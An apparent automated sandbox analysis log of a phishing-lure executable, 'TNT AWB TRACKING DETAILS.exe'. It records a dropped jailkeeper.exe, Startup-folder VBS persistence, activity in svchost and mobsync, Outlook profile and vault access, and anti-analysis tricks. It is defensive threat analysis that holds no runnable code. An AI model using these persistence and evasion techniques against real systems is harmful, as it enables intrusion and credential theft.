                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: ieframe.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: winsqlite3.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                    Source: TNT AWB TRACKING DETAILS.exeStatic file information: File size 1169920 > 1048576
                    Source: TNT AWB TRACKING DETAILS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                    Source: TNT AWB TRACKING DETAILS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                    Source: TNT AWB TRACKING DETAILS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                    Source: TNT AWB TRACKING DETAILS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: TNT AWB TRACKING DETAILS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                    Source: TNT AWB TRACKING DETAILS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                    Source: TNT AWB TRACKING DETAILS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: mobsync.pdbGCTL source: svchost.exe, 00000003.00000003.2630678444.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2630522775.000000000341B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2630705892.0000000003431000.00000004.00000020.00020000.00000000.sdmp, bRQIkEscRm.exe, 00000009.00000003.2747438856.0000000001101000.00000004.00000001.00020000.00000000.sdmp, bRQIkEscRm.exe, 00000009.00000003.2611735467.00000000010EB000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: bRQIkEscRm.exe, 00000009.00000002.3366053235.00000000007CE000.00000002.00000001.01000000.00000007.sdmp
                    Source: Binary string: wntdll.pdbUGP source: jailkeeper.exe, 00000002.00000003.2154686403.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, jailkeeper.exe, 00000002.00000003.2155085204.0000000003530000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2675149274.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2557720740.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2560047406.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2675149274.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, jailkeeper.exe, 00000005.00000003.2267441027.0000000003520000.00000004.00001000.00020000.00000000.sdmp, jailkeeper.exe, 00000005.00000003.2283959181.0000000003710000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2686393797.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2677219601.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2686393797.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2681110501.0000000003300000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000A.00000002.3371145255.0000000005110000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 0000000A.00000002.3371145255.00000000052AE000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 0000000A.00000003.2674544260.0000000004F66000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000A.00000003.2672194568.0000000004DB6000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: jailkeeper.exe, 00000002.00000003.2154686403.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, jailkeeper.exe, 00000002.00000003.2155085204.0000000003530000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000002.2675149274.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2557720740.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2560047406.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2675149274.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, jailkeeper.exe, 00000005.00000003.2267441027.0000000003520000.00000004.00001000.00020000.00000000.sdmp, jailkeeper.exe, 00000005.00000003.2283959181.0000000003710000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2686393797.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2677219601.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2686393797.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2681110501.0000000003300000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000A.00000002.3371145255.0000000005110000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 0000000A.00000002.3371145255.00000000052AE000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 0000000A.00000003.2674544260.0000000004F66000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000A.00000003.2672194568.0000000004DB6000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: mobsync.pdb source: svchost.exe, 00000003.00000003.2630678444.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2630522775.000000000341B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2630705892.0000000003431000.00000004.00000020.00020000.00000000.sdmp, bRQIkEscRm.exe, 00000009.00000003.2747438856.0000000001101000.00000004.00000001.00020000.00000000.sdmp, bRQIkEscRm.exe, 00000009.00000003.2611735467.00000000010EB000.00000004.00000020.00020000.00000000.sdmp
                    Source: TNT AWB TRACKING DETAILS.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                    Source: TNT AWB TRACKING DETAILS.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                    Source: TNT AWB TRACKING DETAILS.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                    Source: TNT AWB TRACKING DETAILS.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                    Source: TNT AWB TRACKING DETAILS.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EC4B37 LoadLibraryA,GetProcAddress,0_2_00EC4B37
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EE8945 push ecx; ret 0_2_00EE8958
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001CC4C6 push A3001CBAh; retn 001Ch2_2_001CC50D
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001E8945 push ecx; ret 2_2_001E8958
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041E9A4 push ecx; retf 3_2_0041E9A5
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00411B63 push es; iretd 3_2_00411B64
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00418C73 push ecx; iretd 3_2_00418C7A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041EC7E push cs; iretd 3_2_0041EC7F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00407C3D pushad ; retf 3_2_00407C48
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004034C0 push eax; ret 3_2_004034C2
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00418EE6 push es; iretd 3_2_00418EE7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040D7D7 push eax; ret 3_2_0040D7DC
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040879B push 00000062h; retf 3_2_004087A7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B0225F pushad ; ret 3_2_03B027F9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B027FA pushad ; ret 3_2_03B027F9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B309AD push ecx; mov dword ptr [esp], ecx3_2_03B309B6
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B0283D push eax; iretd 3_2_03B02858
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeFile created: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeJump to dropped file

                    Boot Survival

                    barindex
                    Drops VBS files to the startup folder
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbsJump to dropped file
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbsJump to behavior
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbsJump to behavior
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EC48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00EC48D7
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F45376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00F45376
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001C48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_001C48D7
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_00245376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_00245376
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EE3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00EE3187
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Switches to a custom stack to bypass stack traces
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeAPI/Special instruction interceptor: Address: 15D32E4
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeAPI/Special instruction interceptor: Address: 2C732E4
                    Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
                    Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
                    Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
                    Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
                    Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
                    Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
                    Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B7096E rdtsc 3_2_03B7096E
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeWindow / User API: threadDelayed 4569Jump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeWindow / User API: threadDelayed 5403Jump to behavior
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-104436
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeAPI coverage: 4.2 %
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeAPI coverage: 5.2 %
                    Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
                    Source: C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exe TID: 3496Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exe TID: 6976Thread sleep count: 4569 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exe TID: 6976Thread sleep time: -9138000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exe TID: 6976Thread sleep count: 5403 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exe TID: 6976Thread sleep time: -10806000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\mobsync.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F2445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00F2445A
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F2C6D1 FindFirstFileW,FindClose,0_2_00F2C6D1
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F2C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00F2C75C
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F2EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F2EF95
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F2F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F2F0F2
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F2F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00F2F3F3
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F237EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00F237EF
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F23B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00F23B12
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F2BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00F2BCBC
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_0022445A GetFileAttributesW,FindFirstFileW,FindClose,2_2_0022445A
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_0022C6D1 FindFirstFileW,FindClose,2_2_0022C6D1
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_0022C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_0022C75C
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_0022EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0022EF95
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_0022F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0022F0F2
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_0022F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0022F3F3
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_002237EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_002237EF
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_00223B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00223B12
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_0022BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0022BCBC
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EC49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00EC49A0
                    Source: w2-0G0-7.10.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
